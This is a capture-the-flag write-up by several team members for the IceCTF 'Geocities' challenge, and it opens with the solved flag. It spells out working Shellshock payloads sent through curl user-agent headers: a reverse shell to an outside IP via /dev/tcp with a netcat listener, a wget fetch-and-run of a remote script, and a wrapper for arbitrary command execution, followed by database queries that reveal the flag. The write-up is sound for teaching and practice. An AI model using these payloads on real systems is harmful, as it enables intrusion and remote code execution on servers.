Stage 3 - Geocities

[ikornaselur]

Description

I recently stumbled onto this old geocities site, it's a miracle that it's still up! It must be running some ancient technology and probably hasn't been updated in years, it's our lucky day boys!

Solution

Flag is: IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}

[ikornaselur]

I wanted update you a little on what I have been up to at work lately. The company that I work at has been wanting to adapt this new database management system know as MySQL. So I have learning the syntax and trying to setup a couple of test databases. It has been a really interesting experience, this is a great way to store large amounts of data.

One of the blog posts on the page. Some old MySQL exploit maybe?

[koddsson]

Asked about this on IRC since @stebbib has made the shellshock connection which gained us entry onto the server

[koddsson]

So we can gain reverse shell access at this point by issuing the following command on a machine we control:

netcat -lvvp 9999

and then connect to our machine from the geosites machine thusly using the shellshock exploit:

curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/178.62.54.99/9999 0>&1" http://geocities.vuln.icec.tf/

(replace the ip and port of the machine in the earlier step)

[koddsson]

Only problem right now is that issuing commands doesn't seem to be working at all, where the connection gets killed before we can do anything. It's most likely due to this:

curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /fbash" http://geocities.vuln.icec.tf/

#!/bin/sh
set -e
trap "pgrep -u ctf | xargs kill -9" EXIT
/bin/bash $@

[koddsson]

We suspect that the flag is in the database that the websites dips into to get the posts:

☁  ~  curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /data/get_posts.pl" http://geocities.vuln.icec.tf/

#!/usr/bin/perl

use strict;
use DBI;

my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;

my $sth = $dbh->prepare("SELECT * from Posts ORDER BY post_date DESC");
$sth->execute();

my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row[1];@$row[2];@$row[3]\n";
}

$sth->finish();
$dbh->disconnect();

[ikornaselur]

Okay, so I am able to drop in a script and run in:

1. Create script in /opt/pub/foo.sh
2. Download to the box:

curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/wget pub.rogueacid.ninja/test.sh -O /var/tmp/deadpool.sh 2>&1" http://geocities.vuln.icec.tf/

1. Run:

curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/sh /var/tmp/deadpool.sh 2>&1" http://geocities.vuln.icec.tf/

[koddsson]

Solved!

We gather together on telegram to try to push through the "last 5%" that we felt that was left of this challenge and figured out we could download remote scripts into /var/tmp/ and execute them for longer than through the shellshock exploit.

Whilst poking around we noticed a bunch more perl scripts and decided to take a look.

☁  geosites  ./exec.sh 'ls /var/tmp'

1.elf
1.pl
1.pl.1
1.pl.10
1.pl.11
1.pl.12
1.pl.13
1.pl.2
1.pl.3
1.pl.4
1.pl.5
1.pl.6
1.pl.7
1.pl.8
1.pl.9
2.pl
3.elf
3.pl
4.elf
5.elf
index.html

Looks like someone was doing some debugging. If this was part of the challenge or some other contestants being sloppy we're not sure but we started picking these files apart to see if there was anything good in 'em.

2.pl has a very similar feel to it as the get_posts.pl in /data where some exploritory work on the database is being done:

#!/usr/bin/perl

use DBI;

($host, $user, $password, $port) = @ARGV;
$host ||= "icectf_mariadb";
$user ||= "geocities";
$password ||= "geocities";
$port ||= 3306;

$db_handle = DBI ->
        connect("DBI:mysql:geocities:$host:$port","$user","$password")
                or die ("connection failed: $DBI::errstr\n");

$getkey = $db_handle -> prepare("SHOW TABLES")
                or die ("SHOW TABLES failed: $DBI::errstr\n");

$getkey -> execute
                or die ("execute failed: $DBI::errstr\n");

print ("Tables in test database on $host, port $port\n");
while (@row = $getkey->fetchrow) {
        print "@row\n";
        }

executing that file yield the following output:

☁  geosites  ./exec.sh 'perl /var/tmp/2.pl'

Tables in test database on icectf_mariadb, port 3306
47a6fd2ca39d2b0d6eea1c30008dd889
Posts

Now Posts we know from the get_posts.pl file but 47a6fd2ca39d2b0d6eea1c30008dd889 looks very juicy right now!

Luckily for us someone already wrote a bit of perl to get us that data that we wanted in 3.pl:

#!/usr/bin/perl

use strict;
use DBI;

my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;

my $sth = $dbh->prepare("SELECT * from 47a6fd2ca39d2b0d6eea1c30008dd889");
$sth->execute();

my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row[1];@$row[2];@$row[3]\n";
}

$sth->finish();
$dbh->disconnect();

Let's see what's in this table!

☁  geosites  ./exec.sh 'perl /var/tmp/3.pl'

IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7};;

Success!!

[koddsson]

My exec.sh script was just a little alias for the shellshock vuln:

☁  geosites  cat exec.sh
curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -c '$1' 2>&1" http://geocities.vuln.icec.tf/

[stebbib]

Forgot to mention that I used a tool called Nikto that ran an analysis on the geocities site and was able to tell that it was vulnerable to the shellshock exploit and even gives out a referal code to the bug. Super nice.